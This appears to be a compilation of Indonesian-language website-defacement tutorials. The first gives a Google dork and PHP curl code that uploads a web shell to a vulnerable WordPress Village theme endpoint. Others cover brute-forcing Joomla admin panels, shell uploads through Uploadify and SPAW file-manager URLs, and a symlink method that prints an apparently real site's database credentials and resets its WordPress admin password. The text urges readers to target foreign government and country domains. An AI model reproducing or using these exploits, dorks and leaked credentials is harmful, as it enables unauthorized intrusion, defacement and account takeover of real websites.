WordPress Village theme Arbitary File Upload

Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell (Bisa Pakek Shell GCA)

Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:/wp-content/themes/village

2).Jika Ketemu Masukan Exploit /wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php

3).Jika Web Vuln Akan Keluar Tulisan {"error":"No files were uploaded."}

4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D

<?php

$uploadfile="shell.php"; 

$ch =

curl_init("http://site/wp-content/themes/village/blueprint/gallery/ajaxupload/server/php.php");

curl_setopt($ch, CURLOPT_POST, true); 

curl_setopt($ch, CURLOPT_POSTFIELDS,

array('qqfile'=>"@$uploadfile"));

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);

curl_close($ch);

print "$postResult";

?>

5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi :D

5).Aktifkan XAMPP Klik Start Pada Apache

6).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
7).Ketik cd\xampp/php

8)ketik php namascript.php Contoh: php lol.php

9).Jika Succes Akan Seperti Gambar Seperti Ini

10).Untuk Letak Shell nanti ada di

http://ste/wp-content/themes/village/blueprint/gallery/ajaxupload/server/uploads/yourshell.php

Cara Deface Web Dengan Bruteforce Attack (Joomla)

                            Anda pasti tahu Hmei 7 kan? Top defacer nomor 1 asal Indonesia tersebut memang paling bisa kalau soal deface, selain toolsnya webdav shell maker, ada lagi lho tools keren buatannya, yaitu tools buat Bruteforce. Jadi kita bisa membrute password sebuah website joomla yang menggunakan template beez dengan tools ini. Penasaran? Simak yang dibawah ini.





1. Download tools bruteforce'nya disini

NB : Di dalam file rar tersebut, terdiri dari brute v2.exe, listsite.txt, pass.txt, dan setting.ini
Brute v2.exe = tools untuk ngebrute
Listsite.txt = tempat untuk menampung target yang akan dibrute
Pass.txt = tempat untuk menampung daftar password brute
Setting.ini = tempat untuk menampung daftar username brute

2. Setelah tools di download, kita cari targetnya menggunakan dork berikut :
intitle:Index of /administrator/
inurl:"/templates/beez5/"
inurl:"/templates/beez-2/"

3. Silahkan pilih - pilih mana yang mau dijadikan target, entah cuman 1, 2, banyak pun boleh, anda masukkan url target http://www.site.com/ ke dalam listsite.txt lalu di save. Sedangkan untuk pass.txt itu adalah password yang nantinya digunakan untuk nge-brute targetnya satu - satu. Anda boleh memperbanyak list passwordnya.

4. Kalau target sudah dikumpulkan, mari sekarang kita mulai bruteforce'nya dengan klik 2x pada brute v2.exe

Beginilah tampilannya

5. Klik "load from file" kemudian pilih listsite.txt yang berisi targetmu tadi

6. Selanjutnya klik "scan"

7. Tunggu proses bruteforce'nya berjalan, lamanya bruteforce tergantung pada jumlah wordlist passwordnya

8. Jika berhasil akan muncul seperti "Password Cracked : passwordnya"

9. Anda masuk deh ke panel adminnya di www.site.com/administrator

10. Selesai! Anda berhasil masuk sebagai admin di website tersebut, silahkan anda tanam shell dan eksekusi web tersebut. Untuk upload shell bisa dilihat caranya disini atau disini

Selamat mencoba dan bersabar ^_^

Cara Ngembangin Dork Exploit Joomla com_user

Sebelum nya perlu Kawan - Kawan Semua Ketahui, Klo Dork com_user yang Ane Tulis ini Hanya Untuk Joomla Versi 1.6 , 1.7 , 2.5.0 - 2.5.2 ..

Ga Perlu Panjang Kali Lebar lah ane ceramah, ntar dikira mau nyaingin Mbah Dirjo. -_-

intext:Joomla! [Versi Nya] site:.[terserah maunya gimana].

intext:Joomla! [VersiNya] - Open Source Content Management site:.[Suka - Suka Kalian].

inurl:index.php+intext:Joomla! [Versinya] site:.[asal bukan site ID] -_-

Ane Cuma Menggunakan Dork itu, jika Masih Ada Yang Tanya Dork lewat Inbox FB ane, Bakal Ane Jitak. -_-

Nah Itu Dulu Dork Dari Ane Untuk Exploit Joomla! com_user..

Sekian Dan Terima Kasih.

Cara Mudah Deface Dengan Upload Shell | Shell Upload Vulnerability

Assalamualaikum...

Salam Sejahtera bagi kita semua,,,

Okey sobat DMI, masih bersama ane admin terbaik sejagad,, hajiahh :D yup, kali ini saatnya berbagi lagi... daripada ga ada kerjaan, mending bagi bagi ilmu aja :D

Pada tutorial ini sama dengan CSRF, cuma sedikit berbeda caranya saja, disini ane gunain OS Backtrack, ane udah coba pake Windows, tapi ribet!! >.< Silahkan sobatcoba2 aja gunain Windows OS, tapi kalo ada masalah nantinya  silahkan di solving sendiri yah.. wokwokwok :D

Bahan - Bahan :

1. Script Upload.php | Download

2. Google Dork: inurl:"/wp-content/themes/Brainstorm/"
 #Silahkan Dork dikembangkan lagi 

3. Live Target : Lihat1 & Lihat2


Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah - Langkah :

1. Pertama cari dulu target dengan menggunakan Dork..

2. Disini ane udah nemuin targetnya.. dan langsung aja cari upload.php nya

Penting! Kalo halaman menjadi kosong, ada kemungkinan exploit bisa dijalankan!

3. Sebelumnya letakkan file Uploadify.php dan Shell sobat di folder /var/www/

4. Lalu edit dulu Uploadify.php dengan Notepad, silahkan dirubah yg ane kasi tanda panah seperti Link target, nama file dan folder! Lalu Save kembali..

5. Selanjutnya Buka terminal dan jalankan Apache dengan ketikkan perintah: /etc/init.d/apache2 start lalu enter!

6. Kemudian ketik perintah berikut diterminal : cd /var/www/ lalu enter!! lalu ketik lagi perintah: php uploadify.php lalu enter! dan silahkan sobat tunggu hasilnya!

7. nah tuh, shell telah berhasil diupload ke web,, selanjutnya tinggal eksekusi shell dan Tebas index web.. wokwokwok :D

Note: Ga semua hasilnya sama begitu,, kalo ga nampil seperti gambar, silahkan sobat cari dimana letak shell sobat :D

Good Luck!!!!! :p

Content Created By Al4Msh4H_77

Cara Deface Web Metode Symlink

Assalamualaikum kali ini saya akan berbagi cara menggunakan Symlink.

Saya anggap agan udah punya target dan sudah di pasang Backdoor/shell di web target, saya tidak akan menjelaskan caranya, karena saya anggap agan sudah bisa mencari target sendiri (^_^).

Pertama masuk ke Shell yang sudah di tanam di web target.

lalu upload Sym.php ( Digunakan untuk SYMLINK ).

Klo belum punya silahkan Download [Here]

Pada gambar di atas saya sudah upload sym.php melalui shell yang saya tanam.

Selanjutnya akses / buka symlink yang telah agan upload.

Lalu klik user & domain & symlink.

Terlihat banyak sekali target-target lain, dan yang akan saya jadikan target adalah thefussyeater.org lalu klik "symlink".

Lalu kita cari confignya, dan target saya ini wordpress saya menemukan wp-config.php lalu saya klik.

Jika CMS Joomla cari saja configuration.php, jika CMS Lokomedia, cari saja di config/koneksi.php, jika CMS Balitbang cari saja di lib/config.php.

Perhatikan baris ini :

define('DB_HOST', 'localhost');

DB NAME = thefussy_wrdp3

DB USER = thefussy_wrdp3

DB PASSWORD = CZyLRz1EuwSd

DB HOST = localhost

Diatas adalah informasi mengenai Akses Database MySQL.

Lalu setelah mendapatkan informasi username & password Database MySQL seperti diatas, kembali ke shell pertama.

Klik koneksi MySQL.

Lalu isi dengan data - data yang telah di peroleh pada file configurasi  diatas tadi, dan saya klik Connect.

Jika di dalam shell agan tidak ada menu Koneksi MySQL Download INI lalu Upload , akses dan login.

Lalu, saya klik "wp_user".

Terlihat passwordnya dalam bentuk encrypt md5, jadi kita rubah saja (^_^).

Agan buat password dalam bentuk MD5 Disini Sob (^_^).

Saya mencoba password 121212 dan setelah di enskripsi menjadi 93279e3308bdbbeed946fc965017f67a Lalu saya rubah password wp-user nya dan saya ganti dengan password saya 93279e3308bdbbeed946fc965017f67a

Saya sudah merubah dengan 93279e3308bdbbeed946fc965017f67a dan saya klik confirm untuk menyimpan pengaturannya, dan pada pengaturan selanjutnya klik Yes.

Berarti saya akan login dengan username admin dan password 121212.

 Sekarang kita coba sob (^_^). 

Saya coba ke halaman loginwebnya http://thefussyeater.org/wp-admin

Saya berhasil masuk (^_^).

Jika sudah seperti ini terserah anda sob, kalo pengen nanam shell silahkan, asal jangan lupa di backup file pentingnya dan jangan di rusak.

Copas Beri Sumber

Deface Website Dengan Metode Spaw Uploads

Kali ini saya mau share tutorial deface sob, nama teknik defacenya yaitu Deface Website Melalui Spaw Uploads Vulnerability.

Yaudah deh, dari pada lama-lama ngoceh ngga jelas, mending langsung ke tkp aja gan. Berikut Cara Deface Website Melalui Spaw Uploads Vulnerability Cekidot (^_^)

1). Pertama, Masukan Dorknya :

inurl:”spaw2/uploads/files/”

Setelah sobat memasukan dork diatas dikotak pencarian google, pilih salah satu web yang mau dideface. Tapi ingat, ngga semua website bisa dideface :p

Notes : Dorknya bisa kalian ubah menurut kreativitas kalian masing-masing, contoh saya tambahkan site:th pada akhir dork diatas. Jadi hasilnya begini :

inurl:”spaw2/uploads/files/” site:th

Maksud dari site:th adalah domain negara asal website yang akan kita serang, "site:th" asal kata Thailand, jadi website yang akan kita serang semuanya website Thailand. Kalian juga bisa mengganti dengan domain negara lain, misalnya site:com.my, site:jp, site:gov.cn etc asal jangansite:co.id yah !

2). Setelah sobat masuk kedalam websitenya, sobat liat Url di addressbar. Contoh Urlnya :

http://contoh.com/spaw2/uploads/files/

3). Ganti pada Bagian /spaw2/uploads/files/ dengan kode dibawah ini :

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi Seperti Ini :

http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=file

4). Tekan Enter, Nanti akan Terbuka Seperti Ini :

5). Selanjutnya Liat Terus Gambar, Karena Tutorial ada Didalam Gambar.

6). Next, Pilih File Deface'an Sobat, Lalu klik Open dan Tunggu Hingga Loading Selesai.

7). Selanjutnya Klik Tombol Upload.

8). Jika Proses Upload Selesai, Nanti akan Muncul Daftar File dan diantaranya ada File yang sobat upload tadi.

9). Selesai, dan Hasilnya :

http://hacker.website.org/

Mungkin orang mengira saya gila tutor, segampang ini harus diperjelas seperti ini. Tapi inilah saya, sosok yang tidak sempurna dan masih banyak kekurangan. Saya hanya ingin memperjelas kepada sobat semua agar sobat bisa mengerti dengan jelas.

Karena dari pengalaman saya dulu saat menjadi newbie ( Sekarang pun Masih Newbie ) susah sekali mencari tutor yang sangat mudah untuk dimengerti, cari sana-sini tapi hasil tetap 0.

Maka tujuan saya menulis tutorial ini biar sobat-sobat semua yang masih pemula ( Bukan saya sok, saya juga masih belajar ) dan masih belajar bisa mengerti.

Sekian Postingan saya kali ini tentang Cara Deface Website Melalui Spaw Uploads Vulnerability, semoga dapat bermanfaat bagi sobat semua.